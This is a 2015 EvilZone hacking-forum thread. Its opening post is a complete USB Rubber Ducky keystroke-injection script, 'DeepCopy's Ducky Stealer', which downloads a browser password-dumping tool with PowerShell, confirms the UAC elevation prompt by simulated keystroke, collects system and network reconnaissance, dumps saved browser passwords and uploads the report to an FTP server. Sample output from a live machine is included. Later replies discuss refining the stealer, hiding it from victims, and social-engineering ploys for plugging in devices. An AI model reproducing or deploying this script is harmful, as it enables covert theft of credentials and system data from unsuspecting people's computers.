EvilZone
iTpHo3NiX, May 28, 2015, 12:50:01 PM
-
Well, I finally decided fuck it and got a Rubber Ducky. Bored at work, I hand-wrote this script; I will test it at home and make modifications as necessary.
REM ********************************
REM *** builddate28.5.2015 ***
REM *** DeepCopy's Ducky Stealer ***
REM *** v1.0 evilzone.org ***
REM ********************************
REM ********************************
REM *** Initial Delay ***
DELAY 2000
REM *** Download Dependancies ***
GUI r
DELAY 400
STRING cmd
DELAY 400
ENTER
GUI r
DELAY 400
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://upload.evilzone.org/?page=download&file=GePROYjEHwjSRNAZgXi9M0QPtLGj00bT3VBFy3mvvNDkwH95e8','%TEMP%\bpd.exe');
ENTER
DELAY 7000
REM *** UAC Bypass - Elevated CMD ***
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
REM *** Start Stealer ***
STRING cd %TEMP%
ENTER
DELAY 400
STRING set num=%random%
ENTER
DELAY 200
STRING set report=%USERNAME%-%num%
ENTER
DELAY 200
STRING echo DeepCopy's Ducky Stealer v1.0 > %report%.txt
ENTER
DELAY 300
STRING echo. >> %report%.txt
ENTER
DELAY 200
STRING echo System Reconnaissance >> %report%.txt
ENTER
DELAY 200
STRING systeminfo >> %report%.txt
ENTER
DELAY 11000
STRING tasklist /v >> %report%.txt
ENTER
DELAY 400
STRING net start >> %report%.txt
ENTER
DELAY 500
STRING net user >> %report%.txt
ENTER
DELAY 300
STRING echo IP Information: >> %report%.txt
ENTER
DELAY 1000
STRING echo. >> %report%.txt
ENTER
DELAY 200
STRING ipconfig /all >> %report%.txt
ENTER
DELAY 400
STRING nslookup myip.opendns.com resolver1.opendns.com >> %report%.txt
ENTER
DELAY 1000
STRING echo. >> %report%.txt
ENTER
DELAY 1000
STRING echo Drives and Directories: >> %report%.txt
ENTER
DELAY 1000
STRING mountvol >> %report%.txt
ENTER
STRING cd %programfiles%
ENTER
STRING dir >> %TEMP%\%report%.txt
ENTER
DELAY 1000
STRING cd %programfiles(x86)%
ENTER
STRING dir >> %TEMP%\%report%.txt
ENTER
DELAY 1000
STRING cd %TEMP%
ENTER
STRING echo. >> %report%.txt
ENTER
DELAY 100
STRING echo Website Save Passwords: >> %report%.txt
ENTER
DELAY 400
STRING bpd.exe -f webpass.txt
ENTER
DELAY 7000
STRING copy %report%.txt + webpass.txt %report%.txt
ENTER
REM *** Create FTP Profile ***
STRING echo user user>ftp.dcs
ENTER
STRING echo pass>>ftp.dcs
ENTER
STRING echo cd htdocs>>ftp.dcs
ENTER
STRING echo PUT %report%.txt>>ftp.dcs
ENTER
STRING echo quit>>ftp.dcs
ENTER
STRING ftp -n -s:ftp.dcs ftp.server
ENTER
DELAY 5000
REM *** Melt Harvested Information ***
REM STRING del /f /q *.dcs
REM ENTER
REM STRING del /f /q *.exe
REM ENTER
REM STRING del /f /q *.txt
REM ENTER
STRING exit
ENTER
REM *** Notify Script is Done ***
GUI r
DELAY 600
STRING notepad
ENTER
DELAY 1000
STRING I'm done master
DELAY 4000
ALT F4
STRING n
ENTER
Edit:
I made some changes; some things wouldn't have worked... I'm sorting out some hosting issues and then I will test it out.
EDIT 5/30/15
Finally working... I will edit and clean up this thread and post what it does, but for now, read the report output (done from a live Win 7 x64 system) and you'll get the hint. To use the script on your own Ducky/NetHunter device, simply change the FTP settings for your server and you're good to go with my script. I will possibly create a Twin Duck version for offline use (download and reports will be on the USB).
Example output:
DeepCopy's Ducky Stealer v1.0
System Reconnaissance
Host Name: xxxx-PC
OS Name: Microsoft Windows 7 Ultimate
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: xxxx
Registered Organization:
Product ID: xxx-OEM-xxxx-xxx
Original Install Date: 7/22/2013, 11:50:51 AM
System Boot Time: 5/30/2015, 9:12:46 PM
System Manufacturer: HP-Pavilion
System Model: VT493AA-ABA s5212y
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 23 Stepping 10 GenuineIntel ~2500 Mhz
BIOS Version: Phoenix Technologies, LTD 5.24, 6/19/2009
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 3,061 MB
Available Physical Memory: 1,724 MB
Virtual Memory: Max Size: 6,121 MB
Virtual Memory: Available: 4,548 MB
Virtual Memory: In Use: 1,573 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\xxxx-PC
Hotfix(s): 347 Hotfix(s) Installed.
Network Card(s): 1 NIC(s) Installed.
[01]: Realtek RTL8101E Family PCI-E Fast Ethernet NIC (NDIS 6.20)
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: xx.xxx.xx.xx
IP address(es)
[01]: xx.xxx.xx.xxx
[02]: xxxx::xxxx:xxxx:xxxx:xxxx
[03]: xxxx:xxx:xxxx:xx:xxxx:xxxx:xxxx:xxxx
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Services 0 24 K Unknown NT AUTHORITY\SYSTEM 0:56:14 N/A
System 4 Services 0 6,740 K Unknown N/A 0:00:22 N/A
smss.exe 832 Services 0 1,088 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 992 Services 0 4,568 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
wininit.exe 364 Services 0 4,380 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 384 Console 1 9,100 K Running NT AUTHORITY\SYSTEM 0:00:02 N/A
winlogon.exe 436 Console 1 7,196 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
services.exe 480 Services 0 9,888 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
lsass.exe 496 Services 0 12,488 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
lsm.exe 508 Services 0 4,124 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 804 Services 0 9,344 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 996 Services 0 8,932 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 1044 Services 0 23,732 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 1108 Services 0 126,036 K Unknown NT AUTHORITY\SYSTEM 0:00:24 N/A
svchost.exe 1152 Services 0 21,840 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 1184 Services 0 39,900 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
svchost.exe 1300 Services 0 5,844 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1432 Services 0 15,932 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:02 N/A
spoolsv.exe 1552 Services 0 14,404 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1592 Services 0 14,308 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
armsvc.exe 1776 Services 0 3,948 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
taskhost.exe 1856 Console 1 17,148 K Running xxx-PC\xxx 0:00:00 MCI command handling window
agr64svc.exe 1960 Services 0 2,696 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
dwm.exe 1968 Console 1 28,584 K Running xxx-PC\xxx 0:00:31 DWM Notification Window
mDNSResponder.exe 2020 Services 0 5,824 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2044 Services 0 8,580 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
DymoPnpService.exe 1336 Services 0 20,228 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
explorer.exe 1688 Console 1 79,496 K Running xxx-PC\xxx 0:00:24 N/A
hkcmd.exe 2180 Console 1 6,180 K Running xxx-PC\xxx 0:00:00 N/A
igfxsrvc.exe 2256 Console 1 6,048 K Running xxx-PC\xxx 0:00:00 OleMainThreadWndName
igfxpers.exe 2316 Console 1 6,036 K Running xxx-PC\xxx 0:00:00 PersistWndName
svchost.exe 2552 Services 0 11,588 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
PSANHost.exe 2668 Services 0 20,760 K Unknown NT AUTHORITY\SYSTEM 0:00:33 N/A
AgentSvc.exe 2796 Services 0 15,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
PSUAMain.exe 2868 Console 1 564 K Running xxx-PC\xxx 0:00:01 TryBarAPPAV
PhoneMyPC_Helper.exe 3056 Services 0 15,632 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
PSUAService.exe 2352 Services 0 404 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
PhoneMyPC.exe 2476 Console 1 19,504 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2160 Services 0 12,100 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
OSPPSVC.EXE 3828 Services 0 11,876 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:01 N/A
SearchIndexer.exe 3912 Services 0 24,840 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
WUDFHost.exe 3968 Services 0 6,164 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
wmpnetwk.exe 3636 Services 0 10,216 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:01 N/A
svchost.exe 3092 Services 0 5,976 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
IntuitUpdateService.exe 1796 Services 0 3,720 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 4512 Services 0 26,572 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
svchost.exe 1584 Services 0 11,772 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
chrome.exe 4580 Console 1 97,716 K Running xxx-PC\xxx 0:00:26 [DUCKY] DeepCopy Ducky Stealer v1.0 (WIP) - Google Chrome
chrome.exe 4084 Console 1 109,348 K Unknown xxx-PC\xxx 0:00:05 N/A
chrome.exe 3472 Console 1 31,172 K Unknown xxx-PC\xxx 0:00:00 N/A
chrome.exe 3140 Console 1 9,256 K Unknown xxx-PC\xxx 0:00:00 N/A
chrome.exe 3268 Console 1 62,012 K Unknown xxx-PC\xxx 0:00:16 N/A
chrome.exe 4928 Console 1 62,448 K Unknown xxx-PC\xxx 0:00:05 N/A
audiodg.exe 1600 Services 0 17,528 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
WmiPrvSE.exe 4396 Services 0 6,732 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
cmd.exe 4492 Console 1 2,908 K Running xxx-PC\xxx 0:00:00 Administrator: C:\Windows\system32\cmd.exe - tasklist /v
conhost.exe 2152 Console 1 5,888 K Running xxx-PC\xxx 0:00:00 OleMainThreadWndName
WmiPrvSE.exe 2680 Services 0 12,128 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
WmiPrvSE.exe 4836 Services 0 5,824 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
TrustedInstaller.exe 3108 Services 0 14,028 K Unknown NT AUTHORITY\SYSTEM 0:00:14 N/A
tasklist.exe 1212 Console 1 5,980 K Unknown xxx-PC\xxxxx 0:00:00 N/A
These Windows services are started:
Adobe Acrobat Update Service
Agere Modem Call Progress Audio
Application Experience
Application Information
Base Filtering Engine
Bonjour Service
CNG Key Isolation
COM+ Event System
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
Desktop Window Manager Session Manager
DHCP Client
Diagnostic Policy Service
Diagnostic Service Host
Diagnostic System Host
Diagnostics Tracking Service
Distributed Link Tracking Client
DNS Client
DYMO PnP Service
Encrypting File System (EFS)
Function Discovery Provider Host
Function Discovery Resource Publication
Group Policy Client
HomeGroup Listener
HomeGroup Provider
Human Interface Device Access
IKE and AuthIP IPsec Keying Modules
Intuit Update Service v4
IP Helper
IPsec Policy Agent
Multimedia Class Scheduler
Network Connections
Network List Service
Network Location Awareness
Network Store Interface Service
Office Software Protection Platform
Offline Files
Panda Devices Agent
Panda Product Service
Panda Protection Service
Peer Name Resolution Protocol
Peer Networking Grouping
Peer Networking Identity Manager
Plug and Play
PnP-X IP Bus Enumerator
Portable Device Enumerator Service
Power
Print Spooler
Program Compatibility Assistant Service
Remote Procedure Call (RPC)
RPC Endpoint Mapper
Security Accounts Manager
Security Center
Server
Shell Hardware Detection
SSDP Discovery
Superfetch
System Event Notification Service
Task Scheduler
TCP/IP NetBIOS Helper
Themes
User Profile Service
WebClient
Windows Audio
Windows Audio Endpoint Builder
Windows Connect Now - Config Registrar
Windows Defender
Windows Driver Foundation - User-mode Driver Framework
Windows Event Log
Windows Firewall
Windows Font Cache Service
Windows Image Acquisition (WIA)
Windows Management Instrumentation
Windows Media Player Network Sharing Service
Windows Modules Installer
Windows Search
Windows Update
WinHTTP Web Proxy Auto-Discovery Service
Workstation
The command completed successfully.
User accounts for \\xxxx-PC
-------------------------------------------------------------------------------
Administrator Guest xxxx
The command completed successfully.
IP Information:
Windows IP Configuration
Host Name . . . . . . . . . . . . : xxxx-PC
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : xxxx.xx.xxxxxxx.net
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : xxxx.xx.xxxxxxx.net.
Description . . . . . . . . . . . : Realtek RTL8101E Family PCI-E Fast Ethernet NIC (NDIS 6.20)
Physical Address. . . . . . . . . : xx-xx-xx-xx-xx-xx
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : 2001:558:6045:5e:147b:10a5:b298:a98e(Preferred)
Lease Obtained. . . . . . . . . . : Saturday, May 30, 2015 9:36:50 PM
Lease Expires . . . . . . . . . . : Wednesday, June 03, 2015 9:36:50 PM
Link-local IPv6 Address . . . . . : xxxx::xxxx:xxxx:xxxx:xxxx%xx(Preferred)
IPv4 Address. . . . . . . . . . . : x.xxx.xx.xxx(Preferred)
Subnet Mask . . . . . . . . . . . : xxx.xxx.xxx.x
Lease Obtained. . . . . . . . . . : Saturday, May 30, 2015 9:30:00 PM
Lease Expires . . . . . . . . . . : Saturday, May 30, 2015 10:30:00 PM
Default Gateway . . . . . . . . . : xxxx::xxxx:xxxx:xxxx:xxxx%xx
xx.xx.xx.xx
DHCP Server . . . . . . . . . . . : xx.xx.xx.xx
DHCPv6 IAID . . . . . . . . . . . : xxxx
DHCPv6 Client DUID. . . . . . . . : xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx
DNS Servers . . . . . . . . . . . : 2001:558:feed::1
2001:558:feed::2
xx.xx.xx.xx
xx.xx.xx.xx
NetBIOS over Tcpip. . . . . . . . : Enabled
Connection-specific DNS Suffix Search List :
xxxx.xx.xxxxxxx.net
Tunnel adapter isatap.hsd1.ca.comcast.net.:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : xxxx.xx.xxxxxxx.net.
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Server: resolver1.opendns.com
Address: 208.67.222.222
Name: myip.opendns.com
Address: xxx.xxx.xxx.xxx
Drives and Directories:
Creates, deletes, or lists a volume mount point.
MOUNTVOL [drive:]path VolumeName
MOUNTVOL [drive:]path /D
MOUNTVOL [drive:]path /L
MOUNTVOL [drive:]path /P
MOUNTVOL /R
MOUNTVOL /N
MOUNTVOL /E
path Specifies the existing NTFS directory where the mount
point will reside.
VolumeName Specifies the volume name that is the target of the mount
point.
/D Removes the volume mount point from the specified directory.
/L Lists the mounted volume name for the specified directory.
/P Removes the volume mount point from the specified directory,
dismounts the volume, and makes the volume not mountable.
You can make the volume mountable again by creating a volume
mount point.
/R Removes volume mount point directories and registry settings
for volumes that are no longer in the system.
/N Disables automatic mounting of new volumes.
/E Re-enables automatic mounting of new volumes.
Possible values for VolumeName along with current mount points are:
\\?\Volume{899bc397-f2f5-11e2-b4be-806e6f6e6963}\
*** NO MOUNT POINTS ***
\\?\Volume{899bc398-f2f5-11e2-b4be-806e6f6e6963}\
C:\
\\?\Volume{899bc3a4-f2f5-11e2-b4be-806e6f6e6963}\
F:\
\\?\Volume{899bc3a8-f2f5-11e2-b4be-806e6f6e6963}\
G:\
\\?\Volume{899bc39b-f2f5-11e2-b4be-806e6f6e6963}\
D:\
Volume in drive C has no label.
Volume Serial Number is CCEF-290B
Directory of C:\Program Files
05/30/2015 08:17 PM <DIR> .
05/30/2015 08:17 PM <DIR> ..
02/06/2015 04:12 PM <DIR> Android
06/22/2014 11:24 AM <DIR> Apache Software Foundation
09/03/2014 08:44 PM <DIR> Bonjour
08/21/2013 01:11 PM <DIR> CCleaner
01/24/2014 10:45 AM <DIR> Common Files
02/12/2014 04:29 PM <DIR> DIFX
04/12/2011 01:28 AM <DIR> DVD Maker
07/22/2013 02:38 PM <DIR> HP
05/13/2015 05:38 PM <DIR> Internet Explorer
02/06/2015 04:09 PM <DIR> Java
07/22/2013 03:11 PM <DIR> LSI SoftModem
07/30/2013 11:58 AM <DIR> Microsoft Analysis Services
04/12/2011 01:28 AM <DIR> Microsoft Games
07/30/2013 12:00 PM <DIR> Microsoft Office
07/30/2013 12:00 PM <DIR> Microsoft SQL Server Compact Edition
07/30/2013 12:00 PM <DIR> Microsoft Synchronization Services
07/13/2009 10:32 PM <DIR> MSBuild
07/22/2013 02:54 PM <DIR> Realtek
07/13/2009 10:32 PM <DIR> Reference Assemblies
01/05/2014 12:05 PM <DIR> SAMSUNG
07/04/2014 02:06 PM <DIR> SoftwareForMe Inc
07/23/2013 03:28 AM <DIR> Windows Defender
05/13/2015 05:37 PM <DIR> Windows Journal
04/12/2011 01:17 AM <DIR> Windows Mail
03/11/2015 03:25 AM <DIR> Windows Media Player
07/13/2009 10:32 PM <DIR> Windows NT
04/12/2011 01:17 AM <DIR> Windows Photo Viewer
11/20/2010 08:31 PM <DIR> Windows Portable Devices
04/12/2011 01:17 AM <DIR> Windows Sidebar
07/30/2013 11:47 AM <DIR> WinRAR
1 File(s) 2,010 bytes
32 Dir(s) 125,307,084,800 bytes free
Volume in drive C has no label.
Volume Serial Number is CCEF-290B
Directory of C:\Program Files (x86)
05/30/2015 08:17 PM <DIR> .
05/30/2015 08:17 PM <DIR> ..
10/01/2013 12:11 AM <DIR> Adobe
01/27/2014 12:07 AM <DIR> Antenna
04/25/2015 04:03 PM <DIR> ArtCine NFO Creator 2.0
04/25/2015 07:04 PM <DIR> Audacity
09/03/2014 08:44 PM <DIR> Bonjour
07/27/2014 05:37 PM <DIR> Breaktru Software
02/06/2015 04:10 PM <DIR> Common Files
08/20/2014 07:38 PM <DIR> DYMO
06/13/2014 12:27 AM <DIR> FileZilla FTP Client
01/24/2014 10:37 AM <DIR> Free Download Manager
03/11/2015 07:45 AM <DIR> Google
07/22/2013 02:38 PM <DIR> HP
06/13/2014 01:48 AM <DIR> iCare Data Recovery
04/04/2015 01:28 PM <DIR> ImageWriter
05/13/2015 05:38 PM <DIR> Internet Explorer
02/20/2015 01:43 AM <DIR> Java
02/12/2014 04:29 PM <DIR> LeapFrog
07/30/2013 11:58 AM <DIR> Microsoft Analysis Services
07/30/2013 11:58 AM <DIR> Microsoft Office
07/30/2013 12:00 PM <DIR> Microsoft.NET
06/13/2014 01:51 AM <DIR> MiniTool Partition Wizard Professional Edition 8.1
05/02/2015 09:03 PM <DIR> Mozilla Firefox
05/28/2015 04:21 PM <DIR> Mozilla Maintenance Service
07/13/2009 10:32 PM <DIR> MSBuild
01/24/2014 10:42 AM <DIR> MSXML 4.0
03/11/2015 07:45 AM <DIR> NCH Software
01/28/2014 11:51 PM <DIR> Nuance
06/12/2014 01:44 AM <DIR> Panda Security
07/13/2009 10:32 PM <DIR> Reference Assemblies
02/06/2015 02:55 PM <DIR> TurboTax
12/19/2014 06:13 PM <DIR> TypingMaster
07/23/2013 03:28 AM <DIR> Windows Defender
04/12/2011 01:17 AM <DIR> Windows Mail
03/11/2015 03:25 AM <DIR> Windows Media Player
07/13/2009 10:32 PM <DIR> Windows NT
04/12/2011 01:17 AM <DIR> Windows Photo Viewer
11/20/2010 08:31 PM <DIR> Windows Portable Devices
04/12/2011 01:17 AM <DIR> Windows Sidebar
1 File(s) 2,584 bytes
42 Dir(s) 125,307,080,704 bytes free
Website Save Passwords:
**********************************************
Browser Password Recovery Report
**********************************************
Browser: Google Chrome
Website: https://mfasa.chase.com/auth/login.html
Username: lololol
Password: olololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: https://segment.com/login
Username: lolololol
Password: lolololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: lololol
Username: lololol
Password: lololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: http://www.registry.cu.cc/checklogin.php
Username: lolololol
Password: lolololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: https://my.bluehost.com/web-hosting/cplogin
Username: lololololol
Password: lololololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: http://panel.byethost.com/login.php
Username: lololol
Password: lolol
---------------------------------------------------------------------------
_______________________________________________________________________
Produced by BrowserPasswordDump from http://www.SecurityXploded.com
-
Cool, so the Ducky uses its own dialect, not Arduino. Can it be programmed with something else? For general purpose I'd go with a more expensive Teensy, but the basic v2 was OK when I was doing this; this might give you some ideas: https://evilzone.org/c-c/%28arduino%29-payload-launcher-for-teensy/
Sadly my Teensy got fried when I was fucking with the firmware... I was gonna order another one lel, because the Ducky is WAY too expensive to get into my country.
-
I'm thinking of getting a Ducky myself. Let us know how the test goes. Didn't read your script in its entirety, but I have a pretty good idea what it does without knowing the Ducky's preferences.
-
Still needs some work; definitely need more delays between commands. Then I've got to fix the report file not uploading, but that has more to do with the free server I'm using than with the script not working. However, the download from FTP isn't working well, so I'm going to do an alternate download method. *nix would be so much easier with wget -_- I can use PowerShell or a VBS script to do it. When I get the time I'll update it. But for now it's still a WIP.
-
Cool script idea, thanks for sharing it. The Ducky is definitely a great device; I've had one for a while now but haven't used it lately. This got me to start playing with it once again. :D
About that alternative download method (if I got your script right, you are sending the harvested info to an FTP server): with the "Twin Duck" firmware you could also save that stuff on the Ducky's SD card. You most likely knew this already, but I'll put the link here anyway in case someone is interested.
https://forums.hak5.org/index.php?/topic/28162-firmware-introducing-twin-duck/
Also, just for info, in case there are some Nexus device owners here who don't know: with NetHunter you can run Ducky scripts from your phone or tablet. Kind of a cool idea if you ask me... "Hey, can I quickly plug my phone into your laptop to charge it?"...
-
Um, Nexus 5 owner here; this is totally new information to me lol. Thanks for sharing m8 +1
-
Well, I updated my script. I'm about to test it now; the file download is causing me the most issues. Can't get the FTP download to work correctly, nor PowerShell... simply can't figure that one out, so VBS is my other option. I'll update this post if this works ;)
-
Honestly, I think going the vbs route would be better all around. More flexibility and could have it put it in the startup folder. Or just write your own code and compile it and just have the ducky copy it over and run it. The ducky script would still be useful to cd into a temp dir and go from there. Have your own code do the heavy lifting.
-
Script is 100% working on my test system. Ended up using a properly formatted PowerShell command for the download. Was fun; now I hope nobody lets me plug a USB into their computer. Now I will probably tweak delays and hide it more so we can do things unnoticed ;)
-
Hmm... well, it seems that they have a European warehouse now, so the Ducky costs 40 euro. Really expensive for a little thing like that... is it really worth it?
-
I paid $40 (USD) and is it really worth it? Probably not. But it is fun to play with. I guess for a black hat it can really be worth it. But also for scripting mundane tasks it could be useful. I like it for harvesting information which is why I wrote this script. Now whenever I'm around a windows computer I can just plug this in and have information necessary for remote intrusion. You could also set it up for backdoor access, however not really what I'm interested in these days. Simply collecting information and the PoC is very interesting. HID that looks like a USB is definitely something fun.
-
I might just buy one to have a ready-made dongle, since my Teensy project went to shit lol. However, I have plans on making a hardware keylogger with it in the future...
So this Ducky has an SD card slot; does that mean the SD card can be used to access and write data? Why don't you just use that instead of trying to download stuff from the web?
The Teensy's SD card shield was pretty good, but the SdFat Arduino lib was pretty unstable with the Teensy in my experience, so I couldn't read or write bigger pieces of data. For that price, I hope the Ducky has it stable enough; if it does, then I might revive the StealthStalker project just for this.
Another thing: do you HAVE to use the Ducky encoder and that Ducky scripting language to program it? Or can it be done with something else?
-
So this Ducky has an SD card slot; does that mean the SD card can be used to access and write data?
Yes, this is possible, like I mentioned in the post above, by flashing the "Twin Duck" firmware onto the Ducky. Quote from the link I posted above:
The Ducky primarily acts as a USB Mass Storage Device, and on a click of the button will start emulating Keyboard
It seems that flashing firmware to the Ducky can be a bit tricky. Haven't tried it myself, but I've read about it. Here is a link to a Python script which should make it easier, if someone is interested:
https://forums.hak5.org/index.php?/topic/29281-release-ducky-flasher-v10/
Another thing: do you HAVE to use the Ducky encoder and that Ducky scripting language to program it? Or can it be done with something else?
As far as I know, yes, you have to use those. But basically with Twin Duck you could write some more complex shell scripts in a file and store them on the Ducky's SD card. Then just use Ducky script to launch that script from the SD card. I know it's not what you meant, but still.
-
Twin Duck firmware is an option, but to be honest I'm scared to flash it and end up with a $40 paperweight. However, with Twin Duck you have to have a delay in your script and wait for your Ducky to be mounted.
@kulver
It comes with a 128 MB microSD card, which is where you store your inject.bin (your payload script); however, unless you have the Twin Duck firmware flashed you won't be able to access it on the victim machine, only when taking the SD card out. An alternate method is a double USB: one USB is the Ducky, the other is for storage. You plug in the storage device, which is, say, given the name PLOAD; you can then write a script for the Ducky to look for the drive titled PLOAD and once it finds it, execute copy, or whatever you want (storage/download). Twin Duck, however, is a much better option for offline info gathering.
-
Well, that sucks. For 40 euro I expected it to be able to access that damn SD card. Looks like the Teensy is a much better option to go with: +pins, +C/Arduino, +SD card shield (tho a bit buggy).
-
Convenience vs Functionality. I'd hardly say the bare metal Teensy is a "better deal" for someone who ONLY wants the capabilities of the Ducky; the Ducky comes in a nicer case and has a whole scripting language built around the end goal, emulating an HID. However, if you want to use the Teensy and have the know-how to program it, then fashion a case for it (even if that IS easy as fuck), then yeah, get the Teensy; it's just a matter of what your time is worth and what features you want.
-
Convenience vs Functionality. I'd hardly say the bare metal Teensy is a "better deal" for someone who ONLY wants the capabilities of the Ducky; the Ducky comes in a nicer case and has a whole scripting language built around the end goal, emulating an HID. However, if you want to use the Teensy and have the know-how to program it, then fashion a case for it (even if that IS easy as fuck), then yeah, get the Teensy; it's just a matter of what your time is worth and what features you want.
Very true. Great, valid points. All I wanted was the Ducky specifically for emulating an HID, and that's what it does. I pull it out and it doesn't look weird, just like a USB stick.